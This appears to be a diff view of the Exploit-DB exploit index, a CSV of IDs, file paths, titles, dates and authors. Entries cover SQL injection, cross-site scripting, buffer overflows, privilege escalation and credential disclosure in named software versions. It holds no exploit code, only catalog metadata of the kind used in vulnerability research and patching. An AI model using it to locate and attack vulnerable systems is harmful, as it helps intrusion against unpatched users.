45587,exploits/windows/local/45587.txt,"Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
45598,exploits/windows_x86/local/45598.py,"Snes9K 0.0.9z - Buffer Overflow (SEH)",2018-10-15,"Abdullah Alıç",local,windows_x86,
45625,exploits/solaris/local/45625.rb,"Solaris - RSH Stack Clash Privilege Escalation (Metasploit)",2018-10-16,Metasploit,local,solaris,
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40130,3 +40133,13 @@ id,file,description,date,author,type,platform,port
45610,exploits/php/webapps/45610.txt,"Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities",2018-10-15,seccops,webapps,php,
45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,
45613,exploits/php/webapps/45613.txt,"KORA 2.7.0 - 'cid' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,
45614,exploits/php/webapps/45614.txt,"HotelDruid 2.2.4 - 'anno' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45615,exploits/php/webapps/45615.txt,"Navigate CMS 2.8.5 - Arbitrary File Download",2018-10-16,"Ihsan Sencan",webapps,php,
45616,exploits/php/webapps/45616.txt,"Library CMS 2.1.1 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,
45617,exploits/php/webapps/45617.txt,"Kados R10 GreenBee - 'release_id' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45618,exploits/php/webapps/45618.txt,"Vishesh Auto Index 3.1 - 'fid' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45619,exploits/php/webapps/45619.txt,"WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,
45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45623,exploits/hardware/webapps/45623.sh,"Heatmiser Wifi Thermostat 1.7 - Credential Disclosure",2018-10-16,d0wnp0ur,webapps,hardware,

Can't render this file because it is too large.